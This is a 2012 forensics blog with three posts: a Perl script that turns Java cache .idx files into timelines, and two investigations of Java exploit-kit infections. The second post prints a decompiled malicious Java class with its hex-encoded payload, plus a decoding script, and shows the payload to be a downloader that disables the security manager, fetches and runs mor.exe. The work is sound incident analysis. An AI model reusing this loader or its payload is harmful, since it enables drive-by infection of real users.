Wednesday, 15 August 2012

Java Forensics using TLN Timelines

Based on my last two previous posts I thought it might be a good time to see how we can introduce some of the Java artifacts we've reviewed. I decided to create a perl script to parse .idx files within the Java cache into TLN format for import into our timelines. I hope that this script will be able to provide analysts with greater context to their investigations and also have a quick way to eyeball URLs within the idx files for anything that could be potentially malicious. Its important to note that again this script is in BETA and further testing is required before you should trust the results within your own investigations.

I had a strong response from my last post on TLN and browser forensics however a number of users did have issues when copying the code and attempting to run with errors such as "Can't find string terminator "EOT" anywhere before EOF at C:\idx.pl line 31". If you get this error its most likely you need to remove the two spaces after EOT and one space before EOT at the very end of the file. I'm also in the process of organising a Google code repository and hopefully this will resolve that issue.

In saying that lets take a look at the script.


 #! c:\perl\bin\perl.exe  
 #---------------------------------------------------------------------  
 # idx.pl   
 # Parse .idx files with the Java cache to TLN format  
 #   
 #   
 # Version: 0.1 (BETA)   
 # Examples:   
 # 1335156604|JAVA|WORKSTATIONNAME|USERNAME|http://malicious_site.com.br/js/jar//fap4.jar?r=1051139  
 # 1347043129|JAVA|WORKSTATIONNAME|USERNAME|http://www.malicious_site.pro/P4fLBitJ-PxK2/yUA83mE  
 # 1347043127|JAVA|WORKSTATIONNAME|USERNAME|http://www.malicious_site.pro/SfLBitJ-PxK2/yUA83mE  
 #---------------------------------------------------------------------  
 use DBI;  
 use strict;  
 use Getopt::Long;  
 use File::Find;  
 use Regexp::Common qw /URI/;  
 use Time::Local;  
 my %config = ();  
 Getopt::Long::Configure("prefix_pattern=(-|\/)");  
 GetOptions(\%config, qw(path|p=s system|s=s user|u=s help|?|h));  
 if ($config{help} || ! %config) {  
     _syntax();  
     exit 1;  
 }  
 die "You must enter a path.\n" unless ($config{path});  
 #die "File not found.\n" unless (-e $config{path} && -f $config{path});  
 my $path =$config{path};  
 my @files;  
 my $line = $_;  
 my %months = ('Jan'=>'01','Feb'=>'02','Mar'=>'03','Apr'=>'04','May'=>'05','Jun'=>'06','Jul'=>'07','Aug'=>'08','Sep'=>'09','Oct'=>'10','Nov'=>'11','Dec'=>'12');  
 my $start_dir = $path;  
 find(  
   sub { push @files, $File::Find::name unless -d; },  
   $start_dir  
 );  
 for my $file (@files) {  
   my ($ext) = $file =~ /(\.[^.]+)$/;  
   if ($ext eq ".idx") {  
             $file =~ s/\\/\//g;  
             open( FILE, "< $file" ) or die "Can't open $file : $!";  
             $line=<FILE>;  
             if ($line){  
                 my @timestamps = $line =~ m/[0-3][0-9] [a-zA-Z][a-z][a-z] [0-9][0-9][0-9][0-9] [0-2][0-9]:[0-5][0-9]:[0-5][0-9]/g;   
                 my @url = $line =~ m/($RE{URI}{HTTP}{-scheme => qr(https?)})/g;   
                 $timestamps[1] = getEpoch($timestamps[1]);  
                 print $timestamps[1]."|JAVA|".$config{system}."|".$config{user}."|".$url[0]."\n";  
             }  
             close(FILE);  
     }  
 }  
 sub getEpoch {  
     my $time = substr ( $_[0],index($_[0], ' ', 10)+1,length($_[0])-1);  
     my $date = substr ( $_[0],0,index($_[0], ' ', 10));  
     my ($hr,$min,$sec) = split(/:/,$time,3);  
     my ($dd,$mm,$yyyy) = split(/ /,$date,3);  
     $mm = $months{$mm};  
     $mm =~ s/^0//;  
     my $epoch = timegm($sec,$min,$hr, $dd,($mm)-1,$yyyy);  
     return $epoch;  
 }  
 sub _syntax {  
 print<< "EOT";  
 idx.pl  
 [option]  
 Parse Java cache IDX files (  
  -p Path..................path to java cache  
  -s Systemname............add systemname to appropriate field in tln file  
  -u user..................add user (or SID) to appropriate field in tln file  
  -h ......................Help (print this information)  
 Ex: C:\\> idx.pl -p C:\\Documents and Settings\\userprofile\\Application Data\\Sun\\Java\\Deployment\\cache\\\ -s %COMPUTERNAME% -u %USERNAME% > events.txt  
 **All times printed as GMT/UTC  
 copyright 2012 Sploit  
 EOT  
 }  

I'm not a programmer by any means so I do my best with my coding but if anybody has any views on some improvements for performance or bugs then let me know. I'm not sure whether its possible to have an IDX file without any of the values i'm looking for so potentially if you have any idx files that don't have a date listed within them then my script will most likely fail. I've also added in some examples of what the output looks like within the script but I'll list them here also to highlight some examples.


  # 1335156604|JAVA|WORKSTATIONNAME|USERNAME|http://malicious_site.com.br/js/jar//fap4.jar?r=1051139   
  # 1347043129|JAVA|WORKSTATIONNAME|USERNAME|http://www.malicious_site.pro/P4fLBitJ-PxK2/yUA83mE   
  # 1347043127|JAVA|WORKSTATIONNAME|USERNAME|http://www.malicious_site.pro/SfLBitJ-PxK2/yUA83mE   

Also to note in regards to IDX files there are typically two timestamps within an IDX file. One is listed as date and one is listed as last modified. In this instance I'm using the "date" to produce the TLN value as from what I've seen this seems to be the time the incident occurred.

Let me know if you find this script of value and if you find any bugs. As mentioned I'll hopefully upload the script to my own Google Code repository shortly and I'll let you all know when that is available in case you're having any troubles getting it to work for you.




Thursday, 9 August 2012

Java Exploit Toolkits - Part 2: Deobfuscating Java Exploit Toolkits

Lets continue with Part 2 of the series on Java Exploit Toolkits. The following post will be a beginners attempt to deobfuscate an obfuscated jar file (what a tongue twister) and I hope that by posting my attempt others may be able to comment on some more efficient ways to conduct this deobfuscation.

The reason why I posted Part 1 of this series was that this particular incident was very similar. It was only due to my experience in my previous incident that I was able to quickly identify artifacts of interest in the incident I will now discuss.

Again I received an image of a machine and was notified that antivirus had detected the following file

 Trojan.FakeAV - C:\Documents and Settings\username\Local Settings\Application Data\{762f1d12-0d4c-e201-bd96-7cb3501bb3b0}\n  

I immediately noticed the similarity between this incident and my previous incident. I decided to start with the event logs again however in this instance I found one single entry and no tamper protection events as I had in Part 1

 Security Risk Found!Trojan.FakeAV in File: C:\Documents and Settings\username\Local Settings\Application Data\{762f1d12-0d4c-e201-bd96-7cb3501bb3b0}\n by: Auto-Protect scan. Action: Cleaned by Deletion. Action Description: The file was deleted successfully.   

I decided that the next logical step would be creating the directory listing and reviewing what occurred around the time of the alert. Reviewing the directory listing I did not find any artifacts of interest. Due to my knowledge of the previous incident I decided to search for .idx files within the directory listing and I found the following

 -A------- 2012-08-07 14:39:00.704 2012-08-07 14:38:57.986 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\lastAccessed  
 -A------- 2012-08-07 14:39:00.689 2012-08-07 14:39:00.658 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\23\74367697-78280468.idx  
 -A------- 2012-08-07 14:39:00.673 2012-08-07 14:39:00.658 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\23\74367697-78280468  
 D-------- 2012-08-07 14:39:00.673 2012-08-07 14:38:49.79 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\23\..  
 D-------- 2012-08-07 14:39:00.673 2012-08-07 14:38:49.79 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\23\.  
 D-------- 2012-08-07 14:39:00.673 2012-08-07 14:38:49.79 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\23  
 D-------- 2012-08-07 14:38:57.986 2012-08-07 14:38:48.954 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\..  
 D-------- 2012-08-07 14:38:57.986 2012-08-07 14:38:48.954 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\.  
 D-------- 2012-08-07 14:38:57.986 2012-08-07 14:38:48.954 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0  
 -A------- 2012-08-07 14:38:57.954 2012-08-07 14:38:56.908 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\57\bffc1b9-44cf1245.idx  
 D-------- 2012-08-07 14:38:57.470 2012-08-07 14:38:49.236 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\57\..  
 D-------- 2012-08-07 14:38:57.470 2012-08-07 14:38:49.236 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\57\.  
 D-------- 2012-08-07 14:38:57.470 2012-08-07 14:38:49.236 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\57  
 -A------- 2012-08-07 14:38:57.454 2012-08-07 14:38:57.64 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\57\bffc1b9-44cf1245  
 -A------- 2012-08-07 14:38:55.64 2012-08-07 14:38:55.64 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\host\c312ea1-3e1f76dc.hst  
 D-------- 2012-08-07 14:38:55.64 2012-08-07 14:38:48.970 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\host\..  
 D-------- 2012-08-07 14:38:55.64 2012-08-07 14:38:48.970 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\host\.  
 -A------- 2012-08-07 14:38:50.892 2012-08-07 14:38:48.673 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\deployment.properties  
 -A------- 2012-08-07 14:38:50.829 2012-08-07 14:38:50.829 c:\Documents and Settings\username\Local Settings\Temp\java_install_reg.log  

At this point I wasn't sure whether the following idx files were part of the incident but I decided, based on the previous incident, that they might be a good place to start.

74367697-78280468.idx

bffc1b9-44cf1245.idx

At this point the URLs discovered in these files definitely looked suspicious but I still needed more information to decide. I decided the next step was to start looking at some of the other files that I've highlighted in orange above

74367697-78280468

I exported the file listed above and uploaded it to virus total. Here are the results. Although there were only 3 hits that was enough for me to gather further suspicion of the files. I renamed the file and added the .jar extension and attempted to open this file with jd-gui. Unfortunately I didn't have any success. I also attempted to rename the file to .exe and run it through Anubis but I wasn't able to do that either. At this point I wasn't really sure what my next step could be with the file so I decided to move on and focus on one of the other files. If anybody has any advice on this file i'd be keen to hear what my next steps might be.

bffc1b9-44cf1245

Again I uploaded the file listed above to virus total to confirm any detections. Here are the results. At this point I was fairly sure that I'd identified the initial infection vector. Once again I added the .jar extension to the file and attempted to open it with jd-gui, SUCCESS! Here is the initial view I had when opening the file in jd-gui

I reviewed each of the classes above. The first two basically seemed like obfuscation and padding techniques to avoid antivirus so I decided to spend my time focusing on 03. Below is what I reviewed when opening 03


 import java.lang.reflect.Method;  
 import java.net.URL;  
 import java.security.CodeSource;  
 import java.security.Permissions;  
 import java.security.ProtectionDomain;  
 import java.security.cert.Certificate;  
 class O3 extends ClassLoader  
 {  
  static ProtectionDomain pd;  
  public static char char_at(String paramString, int paramInt)  
  {  
   return paramString.charAt(paramInt);  
  }  
  public static Method get_func(Class paramClass) throws Exception  
  {  
   return paramClass.getClass().getMethod("newInstance", new Class[0]);  
  }  
  public static void invoke(Method paramMethod, Class paramClass) throws Exception  
  {  
   paramMethod.invoke(paramClass, new Object[0]);  
  }  
  public static String get_perm_name()  
  {  
   return new StringBuffer("setSec").toString() + "urityManager";  
  }  
  public static byte[] string_to_bytes(String paramString)  
  {  
   byte[] arrayOfByte = new byte[paramString.length() / 2];  
   try  
   {  
    Permissions localPermissions = new Permissions();  
    localPermissions.add(new RuntimePermission(get_perm_name()));  
    pd = new ProtectionDomain(new CodeSource(new URL(new StringBuffer("file:").toString() + "///"), new Certificate[0]), localPermissions);  
   }  
   catch (Exception localException) {  
   }  
   int i = paramString.length();  
   for (int j = 0; j < i; j += 2)  
   {  
    int k = (Character.digit(char_at(paramString, j), 16) << 4) + Character.digit(char_at(paramString, j + 1), 16);  
    k = (k - 3) % 256;  
    arrayOfByte[(j / 2)] = (byte)k;  
   }  
   return arrayOfByte;  
  }  
  public static void load(O3 paramO3)  
  {  
   try  
   {  
    int i = 1;  
    String[] arrayOfString = { "CD01BDC10303033303810D032A03350D033603370A03380D0339033A0B033B0B033C0D0339033D0A033E0A033F0B03400D034103420D030C03430D030C03440D030B03450A03460A03470A03480D031403350B03490D0339034A0D0314034B0B034C0D0314034D0D031303430D0312034E0D030B034F0B03500D035103520B03530B03540B03550D031203560D030B03570D031203570D035803590D0358035A0A035B0A035C0A035D0A035E0403093F6C716C77410403062B2C59040307467267680403124F6C71685178706568755764656F680403067578710403172B2C4F6D647964326F64716A3252656D6866773E04030D487B666873776C72717604030D567278756668496C6F6804030B464F37316D6479640F032C032D0A035F0F0360036104032A6D6479643276686678756C777C3253756C796C6F686A68674466776C7271487B666873776C72710A03620F036303640403116B777773316E686873646F6C796804030869646F76680F0365036604031E6D647964326C723245786969687568674C7173787756777568647004030F6D647964327168773258554F040403", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "23232323232323232323232323232323232323234B5757733D32327A7A7A3170", "6C716873666C31737572325337694F456C774D30537B4E35327C58443B367048", "0A03670F036803690F032C036A0F036B036C0F032C036D04031F6D647964326C7232457869696875686752787773787756777568647004031B6D647964326C7232496C6F685278777378775677756864700403196D647964326F64716A325677756C716A457869696875040307574850530F036E036F0F0370037104030B3270727531687B680F037203690F032C03730F03740375040308", "333333373A", "0A03760F03770378040308", "3333343439", "040308", "3333343533", "040308", "3333333A37", "0F0379037A0F037B032D0A037C0F037D037E0F037F03800403166D647964326F64716A32487B666873776C7271040306464F370403136D647964326F64716A3252656D68667704032A6D6479643276686678756C777C3253756C796C6F686A6867487B666873776C72714466776C72710403216D6479643276686678756C777C324466666876764672717775726F6F687504030F677253756C796C6F686A68670403402B4F6D6479643276686678756C777C3253756C796C6F686A6867487B666873776C72714466776C72713E2C4F6D647964326F64716A3252656D6866773E0403136D647964326F64716A32567C7677687004031576687756686678756C777C506471646A68750403212B4F6D647964326F64716A3256686678756C777C506471646A68753E2C5904030E766877537572736875777C04033B2B4F6D647964326F64716A325677756C716A3E4F6D647964326F64716A325677756C716A3E2C4F6D647964326F64716A325677756C716A3E0403136D647964326F64716A325677756C716A04030777756C700403172B2C4F6D647964326F64716A325677756C716A3E0403182B4F6D647964326F64716A325677756C716A3E2C5904030D7273687156777568647004031A2B2C4F6D647964326C72324C717378775677756864703E04031B2B4F6D647964326C72324C717378775677756864703E2C590403096A68776871790403292B4F6D647964326F64716A325677756C716A3E2C4F6D647964326F64716A325677756C716A3E04030964737368716704032F2B4F6D647964326F64716A325677756C716A3E2C4F6D647964326F64716A325677756C716A4578696968753E04030B77725677756C716A04031D2B4F6D647964326C72325278777378775677756864703E4C2C590403077568646704030A2B5E454C4C2C4C0403146D647964326F64716A324C7177686A687504030B73647576684C71770403182B4F6D647964326F64716A325677756C716A3E2C4C0403087A756C776804030A2B5E454C4C2C59040308666F7276680403146D647964326F64716A32557871776C706804030D6A6877557871776C70680403182B2C4F6D647964326F64716A32557871776C70683E040307687B686604032A2B4F6D647964326F64716A325677756C716A3E2C4F6D647964326F64716A32537572666876763E03240329032A0304032B030303050304032C032D0304032E0303034103040305030303112DBA03042DBB03055AAA03074FB403040307030C030F03060304032F0303031903080303030C0307030F030C0314030F0311031003150304033003310305032E030304B10309030A0303042904BB0307140703BF0B4F0640064115081509BB030A5ABE030B5CBE030C5C150DB9030EBA030FB90310BA03113D07BE03125CBE03135CBE03145CBA03151516BB0317B903181519B90318B9031ABA031B140703BA031C3D081C072E06140703B9031D5C409E0393201F634106390918091FA5037B201F67180963141303A40309AA036C201F671809630A739D03162E18095F36151EBB031F859457AA034B201F671809630A7307A303162E18095F361520BB031F859457AA032F201F671809630A7308A303162E18095F361521BB031F859457AA03132E18095F361522BB031F859457870904AA028B1C082E061FB90323AA026A1C07B903241C08B90325BB03263D091C09BE03145CBA03151516BB0317B903181519B90318B9031AB903275AAA03074F04B3030403070423042603280304032F03030371031E030303190307031C030D031D0311031F0319032003310321035B0322036A0324036E032503770327038303290386032B0391032D03A1032F03AD033103BD033303C9033503D9033903E6032503EC033C03F7033E03FC033F03010340040603410423034604260343042703470332030303070304032803040333030303050334" };  
    StringBuilder localStringBuilder = new StringBuilder();  
    for (int j = 0; j < arrayOfString.length; j++)  
    {  
     localStringBuilder.append(arrayOfString[j]);  
    }  
    byte[] arrayOfByte = string_to_bytes(localStringBuilder.toString());  
    Class localClass = paramO3.defineClass(null, arrayOfByte, 0, arrayOfByte.length, pd);  
    invoke(get_func(localClass), localClass);  
   }  
   catch (Exception localException)  
   {  
   }  
  }  
 }  

Basically from what I can gather from this Class file was that it creates an array of strings which i've highlighted in red. It then sends this array to the public static byte[] string_to_bytes(String paramString)  method which attempts to deobfuscate the code. At this point I was pretty lost as I wanted to attempt to deobfuscate the string in hope that it might provide me with a better understanding and potentially some new artifacts to search for within my image.

I decided to create my own java application based on the application above. It would be a good chance for me to dust off some of my Java skills that I'd so happily left in the past. I installed the Java JDK and then downloaded the Eclipse IDE which I was familar with.

I created the following Class based on the output of the above, again this is where I'm sure there are more efficient ways of doing this. My aim was to create a text file which listed the deobfuscated text within it. My class is as follows:

 import java.lang.reflect.Method;  
 import java.io.*;  
 public class exploitMain {  
   /**  
    * @param args  
    */  
   public static void main(String[] args) {  
     load();  
   }  
   public static char char_at(String paramString, int paramInt)  
    {  
     return paramString.charAt(paramInt);  
    }  
   public static byte[] string_to_bytes(String paramString)  
    {  
     byte[] arrayOfByte = new byte[paramString.length() / 2];  
     int i = paramString.length();  
     for (int j = 0; j < i; j += 2)  
     {  
      int k = (Character.digit(char_at(paramString, j), 16) << 4) + Character.digit(char_at(paramString, j + 1), 16);  
      k = (k - 3) % 256;  
      arrayOfByte[(j / 2)] = (byte)k;  
      //System.out.println(k);  
     }  
     return arrayOfByte;  
    }  
    public static void load()  
    {  
     try  
     {  
       int i = 1;  
       String[] arrayOfString = { "CD01BDC10303033303810D032A03350D033603370A03380D0339033A0B033B0B033C0D0339033D0A033E0A033F0B03400D034103420D030C03430D030C03440D030B03450A03460A03470A03480D031403350B03490D0339034A0D0314034B0B034C0D0314034D0D031303430D0312034E0D030B034F0B03500D035103520B03530B03540B03550D031203560D030B03570D031203570D035803590D0358035A0A035B0A035C0A035D0A035E0403093F6C716C77410403062B2C59040307467267680403124F6C71685178706568755764656F680403067578710403172B2C4F6D647964326F64716A3252656D6866773E04030D487B666873776C72717604030D567278756668496C6F6804030B464F37316D6479640F032C032D0A035F0F0360036104032A6D6479643276686678756C777C3253756C796C6F686A68674466776C7271487B666873776C72710A03620F036303640403116B777773316E686873646F6C796804030869646F76680F0365036604031E6D647964326C723245786969687568674C7173787756777568647004030F6D647964327168773258554F040403", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "23232323232323232323232323232323232323234B5757733D32327A7A7A3170", "6C716873666C31737572325337694F456C774D30537B4E35327C58443B367048", "0A03670F036803690F032C036A0F036B036C0F032C036D04031F6D647964326C7232457869696875686752787773787756777568647004031B6D647964326C7232496C6F685278777378775677756864700403196D647964326F64716A325677756C716A457869696875040307574850530F036E036F0F0370037104030B3270727531687B680F037203690F032C03730F03740375040308", "333333373A", "0A03760F03770378040308", "3333343439", "040308", "3333343533", "040308", "3333333A37", "0F0379037A0F037B032D0A037C0F037D037E0F037F03800403166D647964326F64716A32487B666873776C7271040306464F370403136D647964326F64716A3252656D68667704032A6D6479643276686678756C777C3253756C796C6F686A6867487B666873776C72714466776C72710403216D6479643276686678756C777C324466666876764672717775726F6F687504030F677253756C796C6F686A68670403402B4F6D6479643276686678756C777C3253756C796C6F686A6867487B666873776C72714466776C72713E2C4F6D647964326F64716A3252656D6866773E0403136D647964326F64716A32567C7677687004031576687756686678756C777C506471646A68750403212B4F6D647964326F64716A3256686678756C777C506471646A68753E2C5904030E766877537572736875777C04033B2B4F6D647964326F64716A325677756C716A3E4F6D647964326F64716A325677756C716A3E2C4F6D647964326F64716A325677756C716A3E0403136D647964326F64716A325677756C716A04030777756C700403172B2C4F6D647964326F64716A325677756C716A3E0403182B4F6D647964326F64716A325677756C716A3E2C5904030D7273687156777568647004031A2B2C4F6D647964326C72324C717378775677756864703E04031B2B4F6D647964326C72324C717378775677756864703E2C590403096A68776871790403292B4F6D647964326F64716A325677756C716A3E2C4F6D647964326F64716A325677756C716A3E04030964737368716704032F2B4F6D647964326F64716A325677756C716A3E2C4F6D647964326F64716A325677756C716A4578696968753E04030B77725677756C716A04031D2B4F6D647964326C72325278777378775677756864703E4C2C590403077568646704030A2B5E454C4C2C4C0403146D647964326F64716A324C7177686A687504030B73647576684C71770403182B4F6D647964326F64716A325677756C716A3E2C4C0403087A756C776804030A2B5E454C4C2C59040308666F7276680403146D647964326F64716A32557871776C706804030D6A6877557871776C70680403182B2C4F6D647964326F64716A32557871776C70683E040307687B686604032A2B4F6D647964326F64716A325677756C716A3E2C4F6D647964326F64716A32537572666876763E03240329032A0304032B030303050304032C032D0304032E0303034103040305030303112DBA03042DBB03055AAA03074FB403040307030C030F03060304032F0303031903080303030C0307030F030C0314030F0311031003150304033003310305032E030304B10309030A0303042904BB0307140703BF0B4F0640064115081509BB030A5ABE030B5CBE030C5C150DB9030EBA030FB90310BA03113D07BE03125CBE03135CBE03145CBA03151516BB0317B903181519B90318B9031ABA031B140703BA031C3D081C072E06140703B9031D5C409E0393201F634106390918091FA5037B201F67180963141303A40309AA036C201F671809630A739D03162E18095F36151EBB031F859457AA034B201F671809630A7307A303162E18095F361520BB031F859457AA032F201F671809630A7308A303162E18095F361521BB031F859457AA03132E18095F361522BB031F859457870904AA028B1C082E061FB90323AA026A1C07B903241C08B90325BB03263D091C09BE03145CBA03151516BB0317B903181519B90318B9031AB903275AAA03074F04B3030403070423042603280304032F03030371031E030303190307031C030D031D0311031F0319032003310321035B0322036A0324036E032503770327038303290386032B0391032D03A1032F03AD033103BD033303C9033503D9033903E6032503EC033C03F7033E03FC033F03010340040603410423034604260343042703470332030303070304032803040333030303050334" };  
       StringBuilder localStringBuilder = new StringBuilder();  
       for (int j = 0; j < arrayOfString.length; j++)  
       {  
        localStringBuilder.append(arrayOfString[j]);  
       }  
       byte[] arrayOfByte = string_to_bytes(localStringBuilder.toString());  
       //System.out.println(arrayOfByte);  
       String temp = new String();  
       temp = bytesToStringUTFCustom(arrayOfByte);  
       writeToText(temp);  
     }  
     catch (Exception localException)  
     {  
     }  
    }  
    public static String bytesToStringUTFCustom(byte[] bytes) {  
      char[] buffer = new char[bytes.length];  
      for(int i=0;i < bytes.length;i++){  
      buffer[i]=(char)bytes[i];  
      }  
      return new String(buffer);  
      }  
    public static void writeToText(String output) throws IOException {  
      File file = new File("c:/output.txt");  
      BufferedWriter bo = new BufferedWriter(new FileWriter(file));  
      bo.write(output);  
      bo.close();  
    }  
 }  

It was rushed so its fairly messy and I haven't commented on it. If you want to know anything further about it please feel free to leave some comments and I'll get back to you as soon as I can. Finally I reviewed my text  file for further information.

 ????  0 ~  
  ' 2  
  3 4  5  
  6 7  8  9  
  6 :  ;  <  =  
  > ?  
        @  
        A  
    B  C  D  E  
    2  F  
  6 G  
    H  I  
    J  
    @  
    K  
    L  M  
  N O  P  Q  R  
    S  
    T  
    T  
  U V  
  U W  X  Y  Z  [   <init>   ()V   Code   LineNumberTable   run   ()Ljava/lang/Object;    
 Exceptions    
 SourceFile   CL4.java  ) *  \  ] ^  'java/security/PrivilegedActionException  _  ` a   http.keepalive   false  b c   java/io/BufferedInputStream   java/net/URL                                                                                                             HTTp://www.XXXXXXX.pro/P4fLBitJ-PxK2/yUA83mE  d  e f  ) g  h i  ) j   java/io/BufferedOutputStream   java/io/FileOutputStream   java/lang/StringBuffer   TEMP  k l  m n   /mor.exe  o f  ) p  q r   00047  s  t u   00116   00120   00074  v w  x *  y  z {  | }   java/lang/Exception   CL4   java/lang/Object  'java/security/PrivilegedExceptionAction   java/security/AccessController   doPrivileged  =(Ljava/security/PrivilegedExceptionAction;)Ljava/lang/Object;   java/lang/System   setSecurityManager   (Ljava/lang/SecurityManager;)V   setProperty  8(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;   java/lang/String   trim   ()Ljava/lang/String;   (Ljava/lang/String;)V    
 openStream   ()Ljava/io/InputStream;   (Ljava/io/InputStream;)V   getenv  &(Ljava/lang/String;)Ljava/lang/String;   append  ,(Ljava/lang/String;)Ljava/lang/StringBuffer;   toString   (Ljava/io/OutputStream;I)V   read   ([BII)I   java/lang/Integer   parseInt   (Ljava/lang/String;)I   write   ([BII)V   close   java/lang/Runtime    
 getRuntime   ()Ljava/lang/Runtime;   exec  '(Ljava/lang/String;)Ljava/lang/Process; ! & '   (      ) *   +  >       *?  *?  W?  L?                 ,                               
      - .   +  ?      & ?     ? L = >    ?  W?  Y?      Y   
 ?  ?  ?   
 ?  : ?  Y?  Y?  Y?    ?  ?    ?  ?  ?     ?  :   +    ?  Y=? ?  `> 6    ? x  d  `   ?  ? i  d  ` p?  +  \3  ?  ??T? H  d  ` p ?  +  \3  ?  ??T? ,  d  ` p ?  +  \3  ?  ??T?  +  \3  ?  ??T?  ???  +  ? ??g  ? !  ? "? #:   ?  Y?    ?  ?    ?  ?  ? $W?  L ?       # %   ,  n            
            .   X   g ! k " t $ ? & ? ( ? * ? , ? . ? 0 ? 2 ? 6 ? " ? 9 ? ; ? < ? =   >  C # @ $ D /      %   0    1  


Its difficult to make this output easy to read. I've highlighted the areas of interest in red. In particular it shows an additional file and the URL with the same site we'd previously discovered. Overall I was fairly happy to find an additional artifact to search for which unfortunately I did not  find in this instance.

I hope you find this to be useful and hopefully some of you may comment on more efficient ways of doing what i've done above. Would love to gather any advice from anyone that does this on a more regular basis.








Java Exploit Toolkits - Part 1: Finding The Initial Infection Vector

So before I start I'd like to thank Corey Harrell for the following fantastic posts in regards to finding the initial attack vector and in particular highlighting some of the java artifacts an analyst might expect to see from a Java exploit toolkit.

If you haven't seen the posts already then I highly recommend you review the following posts by Corey.

Finding the Initial Infection Vector
Malware Root Cause Analysis

This post will follow Corey's guide to finding the initial attack vector, a java exploit toolkit, and will lead into my next post Java Exploit Toolkits - Part 2: Deobfuscating Java Exploit Toolkits.

Lets get started. 

I was presented with an image of a workstation that had received a single virus alert which had detected the following file:

 Backdoor. Trojan - C:\Windows\Installer{a01f369f-9731-282d-71b6-e8855551185f}\n  


I decided to start with the Windows Events and review those to see if there were any virus detections and to confirm the information i'd been provided. As suspected I found the original alert but also a few more which i've listed below (note: the actual username has been replaced with 'username')

 Security Risk Found!Backdoor.Trojan in File: C:\Documents and Settings\username\Local Settings\Application Data\{a01f369f-9731-282d-71b6-e8855551185f}\n by: Auto-Protect scan. Action: Cleaned by Deletion. Action Description: The file was deleted successfully.  
 Security Risk Found!Trojan.Maljava!gen23 in File: C:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\javapi\v1.0\jar\U7DbO-18afaa21-3d6ae555.zip by: Auto-Protect scan. Action: Quarantine succeeded : Access denied. Action Description: The file was quarantined successfully.  
 Security Risk Found!Trojan.Gen in File: C:\Documents and Settings\All Users\Application Data\6C82D11B21D185215B60FBE17B07D287\6C82D11B21D185215B60FBE17B07D287.exe by: Auto-Protect scan. Action: Quarantine succeeded : Access denied. Action Description: The file was quarantined successfully.   


On reviewing of the events I also found that Symantec Antivirus Tamper Protection control had reported seven (7) days earlier that two files had attempted to disable the Antivirus protections

 SYMANTEC TAMPER PROTECTION ALERT Target: C:\Program Files\Symantec\Symantec Endpoint Protection\SmcGui.exe Event Info: Terminate Process Action Taken: Blocked Actor Process: C:\Documents and Settings\username\Local Settings\Temp\3E8.tmp (PID 2936)   
 SYMANTEC TAMPER PROTECTION ALERT Target: C:\Program Files\Common Files\Symantec Shared\ccApp.exe Event Info: Terminate Process Action Taken: Blocked Actor Process: C:\Documents and Settings\All Users\Application Data\6C82D11B21D185215B60FBE17B07D287\6C82D11B21D185215B60FBE17B07D287.exe (PID 860)  

The next step I followed was to create a directory listing of the image and review the events that occured on disk around the time that the tamper protection events had started. 

 -A------- 2012-07-30 20:14:38.100 2012-07-30 20:14:37.850 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\javapi\v1.0\jar\U7DbO-18afaa21-3d6ae555.idx  
 -A------- 2012-07-30 20:14:38.69 2012-07-30 20:14:37.882 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\javapi\v1.0\jar\U7DbO-18afaa21-3d6ae555.zip  
 D-------- 2012-07-30 20:14:37.850 2012-07-11 19:06:34.285 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\javapi\v1.0\jar\..  
 D-------- 2012-07-30 20:14:37.850 2012-07-11 19:06:34.285 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\javapi\v1.0\jar\.  
 D-------- 2012-07-30 20:14:37.850 2012-07-11 19:06:34.285 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\javapi\v1.0\jar  
 -A------- 2012-07-30 20:14:37.272 2012-07-11 19:06:34.473 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\log\plugin150_06.trace  
 -A------- 2012-07-30 20:14:34.741 2012-07-11 19:06:34.160 c:\Documents and Settings\username\Local Settings\Temp\java_install_reg.log  

Thanks to the posts by Corey that I highlighted earlier I immediately focused on the java artifacts that he'd mentioned. I could see that the user in question was browsing with Internet Explorer (not shown above) at the time the events were generated but also that the artifacts highlighted in red were created around the time in question. Unfortunately as we saw above anti virus had already quarantined the zip file so unfortunately I would not be able to use jd-gui to open the zip file. 

Instead I decided to focus on the .idx file and at least attempt to idenfity the website that had dropped the malware I opened the idx file and viewed the following (note: i've removed the malicious url and replaced it with 'x')



So by now I realised that the user had been browsing the web and hit the malicious website within the idx file. The zip file highlighted above had been downloaded and then executed and run. My final objective was to review the java_install_reg.log and confirm that java had executed. I opened the file and found the following

 -----------------------------------------  
